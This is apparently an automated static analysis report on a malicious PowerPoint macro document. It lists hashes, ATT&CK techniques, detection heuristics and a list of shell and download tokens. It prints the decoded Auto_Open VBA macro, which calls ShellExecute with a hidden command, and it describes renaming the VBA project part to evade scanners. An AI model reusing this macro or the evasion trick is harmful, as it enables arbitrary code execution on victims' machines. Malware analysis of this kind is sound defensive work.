Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 670e6cfe8ffded59…

MALICIOUS

Office (OOXML)

8.8 KB First seen: 2021-08-20
MD5: 442e555300c8fc9f23d2541b50cd5683 SHA-1: 44ced2fda2806966ac9cb596959d75c9da9929f6 SHA-256: 670e6cfe8ffded59575d5770f5685f2be005bd4352a9687b860282d4258a4cf7
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The OOXML document contains a VBA macro that is automatically executed upon opening (Auto_Open). This macro utilizes CreateObject to instantiate 'Shell.Application' and then executes a command. The VBA project part was renamed to evade detection, indicating a deliberate attempt to conceal malicious activity. The macro's intent is to run arbitrary commands on the victim's system.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/akdapsdlapsd.b)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Outlook = CreateObject("Outlook.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Auto_Open _
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/ddwddgwfwowkooooi In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 661 bytes
SHA-256: 832302b873dbe63dc99c14e5b971f6cdf136ea1d95581a3cf4938bc2c0882d91
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module111"
Sub _
Auto_Open _
()
Set Outlook = CreateObject("Outlook.Application")
Set Microsoft = Outlook.CreateObject("Shell.Application")
Microsoft.ShellExecute hola.gola.Accelerator + hola.gola.ControlTipText, hola.gola.Caption
End _
Sub


Attribute VB_Name = "hola"
Attribute VB_Base = "0{4849019A-3351-49CD-919D-DDD73440F4B0}{58FAF3E2-E78A-4EE3-A7F6-E552181D8221}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()

End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/akdapsdlapsd.b 18944 bytes
SHA-256: 5e44886779162308d3a772f4f5541cc63e59df87f7995fb3976bf65120a71bc8